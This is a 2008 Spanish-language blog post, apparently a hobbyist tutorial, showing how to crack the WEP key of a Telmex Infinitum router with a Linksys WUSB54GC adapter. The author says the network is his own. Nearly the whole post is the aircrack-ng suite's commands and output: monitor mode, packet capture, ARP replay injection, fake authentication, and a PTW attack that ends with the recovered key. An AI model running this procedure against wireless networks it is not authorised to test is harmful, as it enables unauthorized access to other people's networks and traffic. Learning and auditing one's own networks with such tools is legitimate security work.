03 agosto, 2008

reinyeccion de trafico con Linksys wusb54gc chipset ralink modulo rt73




Aqui dejo como inyectar con esta usb WUSB54GC sobre un infinitum de telmex
use debian :P y mi mini itx =)
mini:/home/neo/Desktop# uname -a
Linux mini 2.6.25-2-686 #1 SMP Fri Jul 18 17:46:56 UTC 2008 i686 GNU/Linux


primero y a que tenemos instalada la tarjeta usb tenemos que levantarla con airomon y lo hacemos 2 veces esto para crear 2 interfaces logicas virtuales o como les les llame o.O, en este caso como es mi propio 2wire no cambie la mac xD. noten que se han creado mon0 y mon1


mini:/home/neo# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

mini:/home/neo# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon1)
mon0 Ralink 2573 USB rt73usb - [phy0]

miren el ifconfig
Free Image Hosting at www.ImageShack.us



luego hacemos un scan para saber que redes hay por ahi
mini:/home/neo/Desktop# iwlist wlan0 s
wlan0 Scan completed :
Cell 01 - Address: 00:1E:C7:75:57:99
ESSID:"INFINITUM1003"
Mode:Master
Channel:5
Frequency:2.432 GHz (Channel 5)
Quality=47/100 Signal level=-78 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=00000000a25ca7ae

en este caso esta es la red que elegi la mia o.O'
corremos airodump para comenzar a sniffear especifico que sea el canal 5 y que solo capture de un bssid en especifico -w que haga un archivo llamado hola y que use la interfaz de mon0 miren el comando

mini:/home/neo/Desktop# airodump-ng --channel 5 --bssid 00:1E:C7:75:57:99 -w hola mon0

comenzamos con aireplay le digo que mande 1024 paquetes por segunto. el bssid y la mac de mi tarjeta que use las interfaces de mon0 mon1

mini:/home/neo# aireplay-ng --arpreplay -x 1024 -b 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed -i mon0 mon1


le decimos aireplay que haga una autenticacion falsa -a mac ap -h tumac con mon1
mini:/home/neo# aireplay-ng -1 0 -a 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed mon1
00:12:40 Waiting for beacon frame (BSSID: 00:1E:C7:75:57:99) on channel 5

00:12:40 Sending Authentication Request (Open System)
00:12:40 Authentication successful
00:12:40 Sending Association Request
00:12:40 Association successful :-) (AID: 1)


ya capturados algunos paquetes comenzamos a crackear con aircrack -z es ptw
mini:/home/neo/Desktop# aircrack-ng -z hola-01.cap
Opening hola-01.cap
Read 125360 packets.

# BSSID ESSID Encryption

1 00:1E:C7:75:57:99 INFINITUM1003 WEP (61768 IVs)

Choosing first network as target.

Opening hola-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 61768 ivs.
KEY FOUND! [ 10:52:47:03:89 ]
Decrypted correctly: 100%

y ahi saca la llave.


By artzneo at 2008-08-03

Publicar un comentario